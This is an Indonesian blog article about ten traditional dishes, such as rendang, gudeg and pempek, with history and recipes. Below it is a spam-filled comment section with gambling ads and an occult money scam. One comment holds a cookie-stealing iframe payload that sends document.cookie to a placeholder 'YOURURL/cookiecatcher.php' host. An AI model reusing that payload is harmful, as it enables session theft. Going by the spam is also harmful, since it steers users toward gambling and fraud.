Kamis, 08 November 2012

10 Artikel Kuliner Khas Indonesia

Mari menjelajahi beragam kekayaan kuliner indonesia. Tidak hanya tempat wisatanya yang lluar biasa. Indonesia juga memiliki beragam kekayaan kuliner yang khas. Selamat
membaca.


1. Mie Kocok Bandung

 



Meskipun makanan pokok kebanyakan orang Indonesia itu nasi, ternyata banyak juga di antara kita yang gemar makan mie. Karena itu tidak heran kalau di Indonesia mie juga menjadi salah satu makanan laris karena banyak diburu. Olahan mie di Indonesia sendiri sangat beragam. Seperti mie ayam, ada mie aceh, mie jawa, dan yang tidak kalah populernya adalah mie kocok.
 
Mi kocok adalah makanan khas dari Bandung. Bisa dibilang kalau makanan ini cukup untuk mengenyangkan perut karena komposisinya yang berat.

Sesuai namanya, makanan ini berbahan dasar mie. Ukuran mienya agak tebal seperti kwetiew. Biasanya, mi kocok disantap  bersama bakso, kikil, tahu, dan taoge. Lalu, mie ini disiram kuah sapi. Setelah itu,  diberi taburan bawang goreng dan potongan daun seledri. Eehm……dijamin jadi laper kalau liat makanan in. Rasanya yang segar dan lezat menjadikan makanan banyak digemari masyarakat. Cocok disantap selagi masih panas. Selain itu kuliner khas Bandung satu ini juga bisa dinikmati dengan diberi tambahan sambal, saos, atau kecap sesuai selera.  

Sebenarnya, asal mula nama mie kocok ini kurang jelas. Tetapi, kalau dilihat dari cara memasaknya, mungkin itu jawabannya kanapa disebut mie kocok.  Mie yang masih mentah, direbus ke dalam wadah yang besar. Setelah itu, mie tadi diangkat menggunakan alat sejenis gayung panjang yang bolong utnuk jalan keluar air. Selama proses pengangkatan, mie tadi dikocok-kocok supaya merata matangnya dan lebih bersih dan proses ini dilakukan berkali-kali. Nah, mungkin itu dia kenapa disebut mie kocok.
 
Di Bandung, mie kocok ini sangat mudah ditemukan di pinggiran jalan. Biasanya mie ini dijual dengan menggunakan gerobak lalu didorong keliling. Tapi, kita juga bisa menemukan gerobak mie kocok yang sedang mangkal. Biasanya, mangkalnya di tempat-tempat yang ramai seperti di sekolah, daerah perkantoran, bahkan di pusat perbelanjaan. Selain itu, harganya juga relative murah kok. Jadi, kalo lagi pergi ke Bandung, wajib coba dan icip-icip mie kocok kuliner khas Bandung.
 2. Kerak Telor Betawi




Kerak telor adalah makanan asli daerah Jakarta (Betawi), dengan bahan-bahan beras ketan putih, telur ayam, ebi (udang kering yang diasinkan) yang disangrai kering ditambah bawang merah goreng, lalu diberi bumbu yang dihaluskan berupa kelapa sangrai, cabai merah, kencur, jahe, merica butiran, garam dan gula pasir. Mirip seperti martaba. Rasanya gurih dan sangat lezat disantap selagi hangat.

Proses kehadiran kerak telor menjadi makanan tradisional Betawi tak lepas dari proses akulturasi atau percampuran kebudayaan antar bangsa. Kita ketahui bahwa sejak abad ke-5, tanah Jakarta, khususnya kawasan Pelabuhan Kalapa, telah menjadi kawasan internasional. Berbagai bangsa>>
Maksudnya, di Pelabuhan Kalapa sudah terjadi interaksi antaretnis maupun bangsa. Konon, kerak telor dipengaruhi oleh tradisi kuliner India, Arab, Tionghoa, bahkan Portugis.

Pengaruh India dibawa oleh para pedagang dari Gujarat yang membawa serta pedagang dari Kerala, yang terkenal sebagai juru masak handal. Mereka yang memperkenalkan kari, jenis masakan yang berasal dari Tamil, India namun menggunakan rempah-rempah yang berasal dari Indonesia. Mereka juga membawa martabak, atau yang disebut orang Kerala sebagai beda roti yang berarti roti dengan telur.

Masakan Arab terkenal dengan bumbu rempah-rempahnya seperti jinten, kapulaga, cengkeh, kayu manis, wijen dan minyak samin sehingga aroma rempahnya sangat nyata dengan rasa bertemu pedas. Beberapa contoh jenis masakan Arab dalam sajian dapur Betawi seperti acar bawang merah, soto tangkar, sayur bebanci, nasi goreng kambing, nasi kebuli, pacri nanas dan masih banyak lagi.

Jejak komunitas keturunan Portugis masih dapat kita jumpai di Kampung Tugu di utara Jakarta. Salah satu ciri masakan Portugis terletak pada bumbu yang dibakar. Contoh masakannya adalah pindang serani, di mana bumbu-bumbu pembuatnya dibakar terlebih dahulu. Begitu pula hidangan ringan kenari pada bolu karamel, talam singkong, dan lain-lain.



3. Gudeg Yogyakarta



Yogyakarta. Daerah istimewa yang biasa disebut Jogja ini mempunyai sejumlah makanan enak, murah dan bergizi. Atmosfer seni yang 'nyentrik' dan kekayaan kulinernya selalu bikin hati siapa saja kepincut. Tidak hanya wisatawan lokal, turis mancanegara pun tak pernah bosan berkunjung ke kota berjuluk 'Never ending asia' ini.
Salah satu makanan khas nya adalah Gudeg. Gudeg (bahasa Jawa gudheg) adalah makanan khas Yogyakarta dan Jawa Tengah yang terbuat dari nangka muda yang dimasak dengan santan dan dibumbui dengan kluwek. Warna coklat biasanya dihasilkan oleh daun jati yang dimasak bersamaan. Gudeg dimakan dengan nasi dan disajikan dengan kuah santan kental (areh), ayam kampung, telur, tahu dan sambal goreng krecek.

Ada berbagai varian gudeg, antara lain:
  • Gudeg Kering, yaitu gudeg yang disajikan dengan areh kental, jauh lebih kental daripada santan pada masakan padang.
  • Gudeg Basah, yaitu gudeg yang disajikan dengan areh encer.
  • Gudeg Solo, yaitu gudeg yang arehnya berwarna putih
Salah satu warung gudeg yang terkenal akan kelezatannya adalah warung Gudeg Wijilan
Gudeg Wijilan memang bercita rasa khas, berbeda dengan gudeg pada umumnya. Gudegnya kering dengan rasa manis. Cara memasaknya pun berbeda, buah nangka muda (gori) direbus di atas tungku sekitar 100 derajat celcius selama 24 jam untuk menguapkan kuahnya.

Sebagai lauk pelengkap, daging ayam kampung dan telur bebek dipindang yang kemudian direbus. Sedangkan rasa pedas merupakan paduan sayur tempe dan sambal krecek. Ketahanan gudeg Wijilan ini memang cocok sebagai oleh-oleh, karena merupakan gudeg kering, maka tidak mudah basi dan mampu bertahan hingga 3 hari. Tak heran jika gudeg dari Wijilan ini sudah “terbang” ke berbagai pelosok tanah air, bahkan dunia.

Harganya pun variatif, mulai dari Rp 10.000,- sampai Rp 100.000,-, tergantung lauk yang dipilih dan jenis kemasannya. Bahkan ada yang menawarkan paket hemat Rp 5.000, dengan lauk tahu, tempe, dan telur.

Resep Umum

 Bahan :
  • Nangka muda                                                  500 gr
  • Ayam bertulang                                              500 gr
  • Daun salam                                                     secukupnya
  • Santan, secukupnya sampai gudeg di kuali/panci terendam.
  • Telor rebus, kupas                                           4 buah
 Bumbu halus :
  • 18 butir bw merah
  • 6 siung bw putih
  • 3 sdt tumbar bubuk
  • 2 sdm lengkuas cincang
  • 200 gr gula jawa
  • garam dan gula pasir
  • 40 gr asam jawa
Cara Masak :
  1. Masukkan semua bahan di kuali/panci kecuali telur.
  2. Masak sampai mendidih.
  3. Aduk-aduk sampai rata.
  4. Kecilkan api, masak terus nggak boleh diaduk sampai kuah habis trus warnanya coklat tua gelap.
  5. Oh ya sebelum kuah hampir habis masukkan telor rebus.



http://travel.kapanlagi.com/artikel/kuliner/145-kuliner-jogja-ngangeni.html
4. Rendang




Rendang. Siapa yang tidak kenal dengan kuliner fenomenal khas Indonesia satu ini. Rasanya yang sangat lezat membuat namanya dikenal hingga berbagai belahan dunia. Rendang (bahasa Minang: Randang) adalah salah satu masakan tradisional Minangkabau yang menggunakan daging dan santan kelapa sebagai bahan utama dengan kandungan bumbu rempah-rempah yang kaya. Masakan dengan citarasa yang pedas ini digemari oleh seluruh kalangan masyarakat, dan dapat ditemukan di seluruh Rumah Makan Padang di Indonesia

Rendang adalah masakan yang mengandung bumbu rempah yang kaya. Selain bahan dasar daging, rendang menggunakan santan kelapa (karambia), dan campuran dari berbagai bumbu khas yang dihaluskan di antaranya cabai (lado), serai, lengkuas, kunyit, jahe, bawang putih, bawang merah dan aneka bumbu lainnya yang biasanya disebut sebagai pemasak. Keunikan rendang adalah penggunaan bumbu-bumbu alami, yang bersifat antiseptik dan membunuh bakteri patogen sehingga bersifat sebagai bahan pengawet alami. Bawang putih, bawang merah, jahe, dan lengkuas diketahui memiliki aktivitas antimikroba yang kuat.[2] Tidak mengherankan jika rendang dapat disimpan satu minggu hingga empat minggu.

Proses memasak rendang asli dapat menghabiskan waktu berjam-jam (biasanya sekitar empat jam), karena itulah memasak rendang memerlukan waktu dan kesabaran.[3] Potongan daging dimasak bersama bumbu dan santan dalam panas api yang tepat, diaduk pelan-pelan hingga santan dan bumbu terserap daging.[4] Setelah mendidih, apinya dikecilkan dan terus diaduk hingga santan mengental dan menjadi kering. Memasak rendang harus sabar dan telaten ditunggui, senantiasa dengan hati-hati dibolak-balik agar santan mengering dan bumbu terserap sempurna, tanpa menghanguskan atau menghancurkan daging. Proses memasak ini dikenal dalam seni kuliner modern dengan istilah 'karamelisasi'. Karena menggunakan banyak jenis bumbu, rendang dikenal memiliki citarasa yang kompleks dan unik.

Rendang memiliki posisi terhormat dalam budaya masyarakat Minangkabau. Rendang memiliki filosofi tersendiri bagi masyarakat Minang Sumatera Barat,[5] yaitu musyawarah dan mufakat, yang berangkat dari empat bahan pokok yang melambangkan keutuhan masyarakat Minang, yaitu:
  1. Dagiang (daging sapi), merupakan lambang dari "Niniak Mamak" (para pemimpin Suku adat)
  2. Karambia (kelapa), merupakan lambang "Cadiak Pandai" (kaum Intelektual)
  3. Lado (cabai), merupakan lambang "Alim Ulama" yang pedas, tegas untuk mengajarkan syariat agama
  4. Pemasak (bumbu), merupakan lambang dari keseluruhan masyarakat Minangkabau.
Dalam tradisi Minangkabau, rendang adalah hidangan yang wajib disajikan dalam setiap perhelatan istimewa, seperti berbagai upacara adat Minangkabau, kenduri, atau menyambut tamu kehormatan.
Dalam tradisi Melayu, baik di Riau, Jambi, Medan atau Semenanjung Malaya, rendang adalah hidangan istimewa yang dihidangkan dalam kenduri khitanan, ulang tahun, pernikahan, barzanji, atau perhelatan keagamaan, seperti Idul Fitri dan Idul Qurban.


http://id.wikipedia.org/wiki/Rendang



5. Pempek Palembang








Pempek Palembang, salah satu makanan tradisional dari  Sumatra Selatan yang terbuat dari ikan dan tepung sagu ini sudah populer di Indonesia. Rasanya yang kenyal gurih dengan saus yang asam pedas memang nikmat untuk disantap. Dulunya Pempek Palembang dibuat dari daging ikan Belida yang diambil dari sungai Musi yang mempunyai rasa dan aroma lebih gurih, karena ikan Belida sulit didapat serta mahal maka dipakai daging ikan ikan gabus yang harganya lebih murah, tetapi dengan rasa yang tetap gurih. juga ikan air tawar lainnya seperti ikan putak, toman, dan bujuk. Selain itu sekarang juga menggunakan jenis ikan laut seperti tenggiri, kakap merah, parang-parang, ekor kuning.

Penyajian pempek ditemani oleh saus berwarna hitam kecoklat-coklatan yang disebut cuka atau cuko (bahasa Palembang). Cuko dibuat dari air yang dididihkan, kemudian ditambah gula merah, udang ebi dan cabe rawit tumbuk, bawang putih, dan garam. Bagi masyarakat asli Palembang, cuko dari dulu dibuat pedas untuk menambah nafsu makan. Namun seiring masuknya pendatang dari luar pulau Sumatera maka saat ini banyak ditemukan cuko dengan rasa manis bagi yang tidak menyukai pedas. Cuko dapat melindungi gigi dari karies (kerusakan lapisan email dan dentin). Karena dalam satu liter larutan kuah pempek biasanya terdapat 9-13 ppm fluor. satu pelengkap dalam menyantap makanan berasa khas ini adalah irisan dadu timun segar dan mie kuning.

Jenis pempek yang terkenal adalah "pempek kapal selam", yaitu telur ayam yang dibungkus dengan adonan pempek dan digoreng dalam minyak panas. Ada juga yang lain seperti pempek lenjer, pempek bulat (atau terkenal dengan nama "ada'an"), pempek kulit ikan, pempek pistel (isinya irisan pepaya muda rebus yang sudah dibumbui), pempek telur kecil, dan pempek keriting.
Pempek bisa ditemukan dengan sangat mudah di seantero Kota Palembang. Pempek dijual dimana-mana di Palembang, ada yang menjual di restoran, ada yang dipinggir jalan, dan juga ada yang dipikul. Disemua kantin sekolah/tempat kerja/kampus pasti ada yang menjual pempek. Tahun 1980-an, penjual pempek biasa memikul 1 keranjang pempek penuh sambil berkeliling Kota Palembang jalan kaki menjajakan makanannya.
http://lenterakecil.com/di-balik-kelezatan-pempek-palembang/



6. Lumpia Semarang


Lumpia


Lumpia adalah makanan semacam rollade berisi rebung, telur dan daging ayam atau udang. Citarasa lumpia adalah perpaduan rasa Tionghoa dan Indonesia, karena memang penemunya adalah orang Tionghoa yang menikah dengan orang Indonesia.

Salah satu lumpia paling tekenal di Jawa adalah Lumpia Semarang. Dewasa ini, terdapat enam jenis lumpia semarang dengan cita rasa yang berbeda. Pertama aliran Gang Lombok (Siem Swie Kiem), kedua aliran Jalan Pemuda (almarhum Siem Swie Hie), dan ketiga aliran Jalan Mataram (almarhumah Siem Hwa Nio). Ketiga aliran ini berasal dari satu keluarga Siem Gwan Sing–Tjoa Po Nio yang merupakan menantu dan putri tunggal pencipta lumpia Semarang, Tjoa Thay Yoe–Wasih dan yang terakhir adalah lumpia Jalan TanggaMus (Ny. Mechtildis Tyastresna Halim) lumpia nya bulat-bulat dan gurih

Aliran keempat adalah sejumlah bekas pegawai lumpia Jalan Pemuda, dan aliran kelima adalah orang-orang dengan latar belakang hobi kuliner yang membuat lumpia dengan resep hasil pembelajaran dari lumpia yang sudah beredar.

Generasi tertua saat ini, yaitu generasi ketiga Siem Swie Kiem (68), tetap setia melayani konsumennya di kios warisan ayahnya (Siem Gwan Sing) di Gang Lombok 11. Keistimewaan lumpia Gang Lombok ini menurut sejumlah penggemarnya yang sempat ditemui di kios tersebut adalah racikan rebungnya tidak berbau, juga campuran telur dan udangnya tidak amis.

Lumpia buatan generasi keempat dapat kita peroleh di kios lumpia Mbak Lien alias Siem Siok Lien (43) di Jalan Pemuda dan Jalan Pandanaran. Mbak Lien meneruskan kios almarhum ayahnya, Siem Swie Hie, yang merupakan abang dari Siem Swie Kiem, di Jalan Pemuda (mulut Gang Grajen) sambil membuka dua cabang di Jalan Pandanaran.

Kekhasan lumpia Mbak Lien ini adalah isinya yang ditambahi racikan daging ayam kampung. Ketika awal mula meneruskan usaha almarhum ayahnya, Mbak Lien membuat tiga macam lumpia, yaitu lumpia isi udang, lumpia isi ayam (untuk yang alergi udang), dan lumpia spesial berisi campuran udang serta ayam. Tetapi, karena merasa kerepotan dan apalagi kebanyakan pembeli suka yang spesial, sekarang Mbak Lien hanya membuat satu macam saja, yaitu lumpia istimewa dengan isi rebung dicampur udang dan ayam.

Adapun generasi keempat lainnya, yaitu anak-anak dari almarhum Siem Hwa Nio (kakak perempuan dari Siem Swie Kiem) meneruskan kios ibunya di Jalan Mataram (Jalan MT Haryono) di samping membuka kios baru di beberapa tempat di Kota Semarang. Di antara anak-anak almarhum Siem Hwa Nio ini ada juga yang membuka cabang di Jakarta. Bahkan ada cucu almarhum Siem Hwa Nio sebagai generasi kelima membuka kios lumpia sendiri di Semarang.
 
Selain keluarga-keluarga leluhur pencipta lumpia semarang tersebut, sekarang banyak juga orang-orang ”luar” yang membuat lumpia semarang. Mereka umumnya mantan karyawan mereka. Mereka yang mempunyai hobi kuliner juga turut meramaikan bisnis lumpia semarang dengan membuat lumpia sendiri, seperti Lumpia Ekspres, Phoa Kiem Hwa dari Semarang International Family and Garden Restaurant di Jalan Gajah Mada, Semarang.

  • 12 lembar Kulit Lumpia siap pakai
  • 50 g Wortel, potong dadu
  • 75 g Rolade, potong kecil panjang
  • 30 g Daun bawang, iris halus
  • 2 buah Cabe merah, potong kecil panjang
  • 400 g Bihun jagung Pilihan Bunda, seduh, tiriskan
  • 100 g keju parut kasar

Cara Mudah Membuat Kulit Lumpia Kering Sendiri Dirumah,Resep Membuat Kulit Lumpia Kering
Bahan II :

  • 5 siung Bawang Putih, cincang
  • 1 sdm Kari Bubuk
  • 1 sdt Garam Masala
  • 100 ml Santan Kental
  • 1 sdm Kecap Ikan
  • 1/4 sdt Garam
  • 1 sdt Gula Pasir
  • 1/2 sdt Lada Bubuk
  • minyak untuk menumis

Cara Membuat Kulit Lumpia Kering :

  1. Bahan II: Tumis bawang putih hingga kekuningan.
  2. Masukkan bahan lainnya, aduk hingga santan menyerap.
  3. Masukan rolado, wortel, cabe, daun bawang, masak hingga wortel cukup matangnya, matikan api.
  4. Masukan bihun jagung Pilihan bunda yang sudah diseduh dan keju, aduk rata.
  5. Isi tiap kulit lumpia dengan 2 sdm penuh adonan bihun. Bungkus hingga rapi.
  6. Goreng dengan minyak sedang panasnya hingga kekuningan.
  7. Angkat, sajikan hangat.

Siap disajikan untuk 12 orang.







7. Rawon 



Rawon atau nasi rawon (karena selalu disajikan dengan nasi) adalah menu berupa sup daging dengan bumbukluwek. Rawon, meskipun dikenal sebagai masakan khas Jawa Timur (seperti Surabaya), dikenal pula oleh masyarakat Jawa Tengah sebelah timur (daerah Surakarta). khas karena mengandung

Daging untuk rawon umumnya adalah daging sapi yang dipotong kecil-kecil. Bumbu supnya sangat khas Indonesia, yaitu campuran bawang merah, bawang putih, lengkuas (laos), ketumbar, serai, kunir, lombok, kluwek, garam, serta minyak nabati. Semua bahan ini (kecuali serai dan lengkuas) dihaluskan, lalu ditumis sampai harum. Campuran bumbu ini kemudian dimasukkan dalam kaldu rebusan daging bersama-sama dengan daging. Warna gelap khas rawon berasal dari kluwek.

Rawon disajikan bersama nasi, dilengkapi dengan tauge kecil, daun bawang, kerupuk, dan sambal.
Di Daerah Jawa Timur banyak dijumpai penjual Rawon, terutama rawon Pasuruan banyak yang terkenal. Di Jakarta bisa ditemukan di Restoran Pondok Prapanca Jalan Nipah XV no.3 Kebayoran Baru, Jakarta Selatan (Jalan turunan sebelum Kantor Walikota Jakarta Selatan).

http://www.google.co.id/imgres?hl=id&sa=X&biw=1360&bih=581&tbm=isch&prmd=imvns&tbnid=_HRDCsYstUzNHM:&imgrefurl=http://agsfood.blogspot.com/2009/02/rawon-komplit.html&docid=E3VbvMIKU5fYVM&imgurl=http://farm4.static.flickr.com/3637/3304176261_db8deeedac.jpg&w=500&h=333&ei=F9ibUOHMJoz8rAeQtICgAg&zoom=1&iact=rc&dur=367&sig=110620527109538645161&page=1&tbnh=143&tbnw=226&start=0&ndsp=18&ved=1t:429,r:7,s:0,i:91&tx=142&ty=81

http://id.wikipedia.org/wiki/Rawon




8. Sate Madura



Sate Madura adalah sate khas Madura. Sate Madura biasanya terbuat dari ayam. Madura selain terkenal sebagai pulau garam, juga terkenal dengan satenya. Sate madura sudah terkenal di seluruh Nusantara, Sate Madura dapat ditemukan hampir di semua daerah khususnya di kota besar seperti Medan, Jakarta, Bandung, dan Surabaya.
 
Konon di Madura sendiri sate susah dicari. Tetapi selain ayam sebagai bahan utama sate juga ada yang menggunakan kambing yang ditandai dengan digantungnya bagian kaki belakang si kambing di rombong sang penjual sate. Bumbunya adalah campuran kacang yang ditumbuk halus petis dan sedikit bawang merah. Memanggangnya dengan api dari batok kelapa yang dihanguskan lebih dulu yang disebut dengan arang batok kelapa. Rasanya gurih tapi dipantangkan kepada mereka yang berkolesterol tinggi dan yang pengidap asam urat akut.




9. Papeda 






Papeda atau bubur sagu, merupakan makanan pokok masyarakat Maluku dan Papua. Makanan ini terdapat di hampir semua daerah di Maluku dan Papua.

Papeda dibuat dari tepung sagu. Pembuatnya para penduduk di pedalaman Papua. Tepung sagu dibuat dengan cara menokok batang sagu. Pohon yang bagus untuk dibuat sagu adalah pohon yang berumur antara tiga hingga lima tahun.

Mula-mula pokok sagu dipotong. Lalu bonggolnya diperas hingga sari patinya keluar. Dari sari pati ini diperoleh tepung sagu murni yang siap diolah. Tepung sagu kemudian disimpan di dalam alat yang disebut tumang. Papeda biasanya disantap bersama kuah kuning, yang terbuat dari ikan tongkol atau ikan mubara dan dibumbui kunyit dan jeruk nipis.

Resep Papeda Makanan Khas Papua

Buat teman teman yang pengen tau rasanya nih ada contekan resep papeda...
Selamat mencoba...

Papeda
Bahan :
• 100 gr tepung sagu
• 1000 cc air
• ½ sdt garam
• ½ sdt gula

Cara Membuat :
1. Cairkan  tepung sagu dengan 300 cc air, tempatkan di panci.
2. Tambahkan garam dan gula.
3. Didihkan sisa air, 700 cc.
4. Tuang air mendidih tadi ke dalam panci yang berisi larutan.
sagu. Aduk sehingga sagu matang merata dan berwarna putih bening.
 
Kuah Kuning
 
Bahan :
• 2 ekor ikan kembung (boleh juga ikan tongkol atau kakap)
• 1 bh jeruk nipis
• 2 sdm minyak untuk menumis
• 4 btg kemangi, siangi
Bumbu :
• 4 bh bawang merah
• 2 bh bawang putih
• 3 bh kemiri
• 2 bh cabai merah keriting
• 5 bh cabai rawit, biarkan utuh
• 1 bh tomat merah, belah 4
• 2 cm jahe
• 2 cm kunyit
• 1 btg serai, ambil putihnya, geprak
• 2 lbr daun salam
• 1 sdm gula pasir
• ½ sdm garam (sesuai selera)
Cara Membuatnya :
1. Bersihkan ikan, lumuri dengan garam dan jeruk nipis. sisihkan
2. Haluskan bawang merah, bawang putih, kunyit, jahe , kemiri, dan cabai
merah.
3. Tumis bumbu halus tadi hingga harum , masukan daun salam, serai, dan
tomat.
4. tambahkan 700 cc air, biarkan mendidih
5. Masukkan ikan. Tambahkan garam, gula dan cabai rawit utuh, masak beberapa
menit dengan api besar. Kemudian kecilkan api masak kembali hingga ikan matang.
6. Tambahkan daun kemangi  dan 1 sdm air jeruk nipis sebelum diangkat.
7. Kuah ikan siap dinikmati dengan papeda. 



http://id.wikipedia.org/wiki/Papeda
http://cloud.papua.go.id/id/pariwisata/artikel/Pages/Resep-Papeda-Makanan-Khas-Papua.aspx
10. Bika Ambon





Bika ambon adalah sejenis penganan asal Indonesia. Terbuat dari bahan-bahan seperti telur, gula, dan santan, bika ambon umumnya dijual dengan rasa pandan, meskipun kini juga tersedia rasa-rasa lainnya seperti durian, keju, dan cokelat. Bika ambon biasanya dapat bertahan dalam kondisi terbaik selama sekitar empat hari karena setelah itu kue tersebut mulai mengeras.

Asal-muasal bika ambon tidak diketahui dengan jelas [1]. Pada buku Bunga Angin Portugis di Nusantara, Jejak-jejak Kebudayaan Portugis di Nusantara (2008) karya Paramita R Abdurrahman, disebutkan bahwa salah satu peninggalan Portugis di Maluku adalah tradisi kuliner. Di antara berbagai jenis kuliner yang diperkenalkan kepada penduduk setempat, satu di antaranya adalah bika. Namun tak ada yang bisa menjelaskan bagaimana kue tersebut dibawa atau diperkenalkan oleh orang Ambon ke Medan, atau bagaimana ia bisa bernama bika ambon.[2] [1

Walaupun namanya mengandung kata "ambon", bika ambon justru dikenal sebagai oleh-oleh khas Kota Medan, Sumatera Utara. Di Medan, Jalan Mojopahit di daerah Medan Petisah terdapat sedikitnya 30 toko yang menjual kue ini.[2]. Setiap toko di lokasi ini bisa menjual lebih dari 1.000 bungkus bika ambon per hari apabila menjelang hari raya.[2] Diperkirakan, sebutan bika ambon muncul dari kebiasaan masyarakat yang dahulu baru mengenal bika yang diproduksi di jalan ambon, Medan. Penyebutan bika ambon akhirnya menjadi tradisi seiring dengan berkembangnya industri makanan ini.[2]



http://id.wikipedia.org/wiki/Bika_ambon

87 komentar:

  1. banyak nih informasi tentang kuliner di malang coba kunjungi disini

    BalasHapus
  2. banyak yang harus saya praktekan dari resep-resep di atas. mudah-mudahan hasilnya memuaskan. Trims utk informasinya

    Obat Pelangsing Alami

    Obat Pelangsing Herbal

    Obat Pelangsing Aman

    BalasHapus
  3. Pengen jadi chief nih, seru ...

    BalasHapus
  4. RASAKAN SENSASI KEMENANGAN DENGAN MEJA HOKI DAN KARTU BAGUS SETIAP HARINYA !!
    SATU - SATU NYA SITUS TARUHAN DENGAN RATING KEMENANGAN TERTINGGI DAN PENCARIAN BANDARQ NO. 1 DI GOOGLE!! :)
    Dengan Fasilitas Exclusive :
    Proses Transaksi yg jauh Lebih mudah dan Cepat!!
    Minimal Depo & WD Terjangkau cuma 20 rb!!
    Kartu di Meja juga Lebih Ringan..
    Tidak lupa juga Menemani anda Tips & Trik yg Selalu Jitu..
    Games Juga Mudah di Akses dr berbagai Gadget LHO!!!
    jangan pusing lagi bos.. Bermain dengan santai dan Tenang bersama kami!!
    karena tidak ada pelayanan se-mewah, se-profesional dan se-exclusive Hobiqq,Poker!! ^^
    Kembangkan Hobi anda.. Warnai kartu anda yang hobi selalu kasih QQ !!! ^^
    HUB KAMI DI :
    SKYPE : HOBIQQ
    FACEBOOK : HOBIQQ
    PIN BBM : 7770C8B4
    Yahoo : Hobiqq@yahoo.com
    Line : HOBIQQ
    www.HOBIQQ.poker
    www.HOBYQQ.com
    www.HOBI99.com

    BalasHapus
  5. Allah yang telah mempertemukan saya dengan Mbah Rawa Gumpala dan melalui bantun pesugihan putih beliau yang sebar 5M inilah yang saya gunakan untuk membuka usaha selama ini,makanya saya sengaja memposting pesang sinkat ini biar semua orang tau kalau Mbah Rawa Gumpala bisa membantuh kita mengenai masalah ekonomi dengan bantuan pesugihan putihnya yang tampa tumbal karna saya juga tampa sengaja menemukan postingan orang diinternet jadi saya lansun menhubungi beliau dan dengan senang hati beliau mau membantuh saya,,jadi bagi teman teman yang mempunyai keluhan jangan anda ragu untuk menghubungi beliau di no 085-316-106-111 rasa senang ini tidak bisa diunkapkan dengan kata kata makanya saya menulis pesan ini biar semua orang tau,ini sebuah kisa nyata dari saya dan tidak ada rekayasa sedikit pun yang saya tulis ini,sekali lagi terimah kasih banyak ya Mbah dan insya allah suatu hari nanti saya akan berkunjun ke kediaman Mbah untuk silaturahmi.Wassalam dari saya ibu Sartika dan untuk lebih lenkapnya silahkan buka blok Mbah disini 🔜Pesugihan Putih Tanpa Tumbal🔙

    BalasHapus
  6. SELAMAT DATANG DI WWW.WSD4D.COM
    Togel Online | Togel SGP | Togel HKG | Judi Online | Judi Bola
    .
    1 USER ID UNTUK SEMUA GAME
    - SPORTSBOOK
    - TOGEL
    - 6 GAME POKER
    - Casino
    - Sabung ayam
    - Tangkas
    - Slotgame
    - Habanero
    - Tembak ikan
    - Batu goncang
    - dan game lainnya
    .
    BONUS YANG MENARIK DARI WSD4D(.)COM
    - BONUS NEW MEMBER 100% SPORTSBOOK
    - BONUS NEXT DEPOSIT 10%
    - BONUS DEPOSIT 30% SPORTBOOK
    - BONUS DEPOSIT SETIAP HARI UP TO 20,000
    - DISKON TOGEL 2D : 29% | 3D : 59% | 4D : 65%
    - BONUS CASHBACK UP TO 15% SPORTSBOOK
    - BONUS CASHBACK SABUNG AYAM 5% UP TO 10%
    - BONUS CASHBACK GAMES & TANGKAS 20%
    - LIVE CASINO ROLLINGAN 0,8% (NO LIMIT)
    - BONUS ROLLINGAN POKER & DOMINO 0,3%
    - BONUS REFFERAL 2%
    .
    MIN DEPO & WD CUMA Rp.50.000,-
    BCA - MANDIRI - BRI - BNI - DANAMON
    UNTUK INFORMASI SELANJUTNYA BISA HUB KAMI DI :
    LIVECHAT WSD4D(.)COM YANG ONLINE 24 JAM
    Pin BBM : D887ECDB
    LINE : wsd_4d
    WECHAT : wsd_4d
    SKYPE : VINA WSD
    WA : +855964903955

    BalasHapus
  7. https://vortez0621.wordpress.com/2017/11/17/pre-order-blackberry-keyone-di-indonesia-telah-dibuka-harganya/

    BalasHapus
  8. https://wsdsite.wordpress.com/2017/11/19/pdip-targetkan-90-persen-kemenangan-gus-ipul-anas-di-surabaya/

    BalasHapus
  9. wah sangat bagus ya artikelnya sangat membantu terimakasih :)

    BalasHapus
  10. Agen Bola Online & Casino Online Terpercaya
    1 USER ID UNTUK SEMUA PERMAINAN !!!
    Casinobet77 Menyediakan Permainan Terbaru & Terbaik
    Livecasino | Bolaonline | Sabungayam | PokerDomino | SpadeGaming | SlotGame | Tangkas | BatuGoncang | Jdb168 SlotGame | NumberGame Lottery
    -----------------------------------------------------------------------
    - Bonus Deposit MEMBER BARU Sportbook 100%
    - Bonus Deposit 30% Khusus Permainan Sportbook
    - Bonus Deposit 10% Setiap Hari Untuk Semua Game
    - Bonus Deposit Setiap hari 5rb - 25rb
    - Bonus Casino Rollingan 0.8% Setiap Hari Senin
    - Bonus Rollingan Poker & domino 0,3%
    - Bonus Cashback Game & Tangkas 5%
    - Bonus Cashback Sportbook 5%
    - Bonus Cashback Sabungayam 5%
    - Bonus Referall 2% Semua Game
    - Bonus Referall 1% dari member Togel
    Contact Us Now :
    ?? Livechat Casinobet77
    ?? whatsapp : +85599495431
    ?? PIN BBM : D6235F1C
    ?? Wechat : casinobet77cs1
    ?? Line : casinobet77
    ?? skype : casinobet77
    ?? Link pendaftaran :lc.chat/now/8523001/

    BalasHapus
  11. <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

    BalasHapus
  12. terimakasih ka sangat membantu,untuk tugas saya

    BalasHapus
  13. POKER MULIA
    MAU DAPAT UANG TAMBAHAN?
    AYO GABUNG BERSAMA KAMI DI POKERMULIA
    Gampang Dapat Jackpotnya dan Gampang Banget Menangnya !!!
    Minimal Deposit / Withdraw cuma 20.000

    Yakin Gak Mau Coba ?
    https://goo.gl/mndDmh

    Menyediakan 7 Jenis Permainan TerFAVORIT
    Poker - Domino - Ceme - Capsa - Live Poker - Ceme Keliling - Superten
    Di Dukung 5 Bank Ternama di INDONESIA
    BCA - MANDIRI - BRI - BNI - DANAMON

    Bonus Terbesar di POKERMULIA
    1. Bonus Refferal TANPA SYARAT/SEUMUR HIDUP
    2. Bonus Rollingan TIAP MINGGU/TERBESAR

    Selalu Ada Kejutan Untuk Member POKERMULIA
    Gabung Sekarang Juga dan Raih Kemenangan Puluhan Juta Setiap Hari !!!
    Buruan Daftar Dan Mainkan Sekarang Juga !!!

    CONTACT US :
    - Yahoo : POKERMULIA
    - Skype : POKERMULIA
    - LINE : POKERMULIA
    - BBM : D3F98F26
    - No Hp : +85593842699

    POKER | DOMINO | LIVE POKER | CEME | CAPSA SUSUN | CEME KELILING | SUPER TEN

    BalasHapus
  14. bagus gan, informasinya bagus itu saya tertarik
    salam dari rental mobil

    BalasHapus
